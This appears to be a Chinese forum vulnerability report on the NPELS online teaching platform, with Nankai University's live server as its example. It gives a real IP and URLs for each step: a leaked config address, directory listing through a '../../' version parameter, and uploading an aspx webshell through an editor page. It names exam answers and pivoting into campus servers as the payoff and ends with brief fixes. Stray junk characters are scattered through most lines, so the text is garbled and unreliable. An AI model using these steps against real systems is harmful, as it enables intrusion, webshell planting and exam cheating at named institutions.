新理念外语网络教学平台文件上传漏洞

admin

好多大学都在用这个教学平台，这个漏洞会导致直接拿到试题答案，甚至作为跳板继续渗透进入学校其他服务器中

详细说明：
7 ]- h9 u" Q( v+ h( h
' o; n; M3 `/ ?+ @: S$ C" i以南开大学的为例:
( |" T4 M( {  \. p: \+ e5 K' z% z, o: d1 Khttp://222.30.60.3/NPELS
NPELS_LearningCenter_5.0 客户端下的 Update.exe.config 文件泄露一个重要地址
<setting name="Update_CommonSvr_CommonService" serializeAs="String">
6 x' u& v0 V) C, n3 I<value>http://222.30.60.3/NPELS/CommonService.asmx</value>
2 |! b% o: V* u+ g2 Y( a" {3 J</setting>
及版本号
) i5 J0 l) p6 \: q<add key="TVersion" value="1, 0, 0, 2187">
</add>
' ]) m# @( u7 K* v. c直接访问
http://222.30.60.3/NPELS/CommonService.asmx
使用GetTestClientFileList操作，直接 HTTP GET 列目录：
" @( ~0 M% P: y3 w0 jhttp://222.30.60.3/NPELS/CommonS ... tFileList?version=1, 0, 0, 2187
进一步列目录（返回的网页很大，可以直接 wget 下来）
8 y# C: m# A7 [0 b- _http://222.30.60.3/NPELS/CommonS ... List?version=../../
" j+ P$ [3 i0 x' C4 |( Y$ q
  y- O) T. f/ W- j3 h6 A9 ^9 s发现
& O; F  b% ^8 l! ^' o9 _" ohttp://zzxx.nankai.edu.cn/npelsv/editor/editor.htm
可以上传，直接上传aspx木马即可，不需要改后缀名或者文件头
" ^- A8 \5 L2 t* f9 T7 K6 _" p, o上传后继续列目录找到木马地址直接访问即可
$ r4 k( d9 `+ [0 R# g5 \
OOXX
' c1 A1 D- P' I6 {; d
Google "新理念外语网络教学平台" 测试了几个其他的站，都有类似的列目录上传方法
漏洞证明：
  {9 v0 Y7 v& ]5 ?2 w, s1 f
列目录：
http://222.30.60.3/NPELS/CommonS ... List?version=../../
" O! i- ^: w( E# v( Z文件上传：
http://222.30.60.3/npelsv/editor/editor.htm
" x& U' P5 |3 ^1 N+ ?; p
- G2 B5 d3 I/ W0 G6 W0 ^! J上传木马：
: I, U6 c4 a# p; i. d, {  A, Phttp://222.30.60.3/npelsv/editor/uploadfiles/1.aspx

/ Y; k) `9 u" [( s$ y# N4 n修复方案：
$ \4 z* K/ L( e; O5 s" k% j好像考试系统必须使用 CommonService.asmx
, W5 u9 {& X* K5 m最好配置文件加密或者用别的方式不让它泄露出来
5 W9 t% Y7 n9 G2 ^9 i8 J# K2 x4 g并且检查或删除各上传入口，像 http://222.30.60.3/NPELS/Upload.aspx 一样​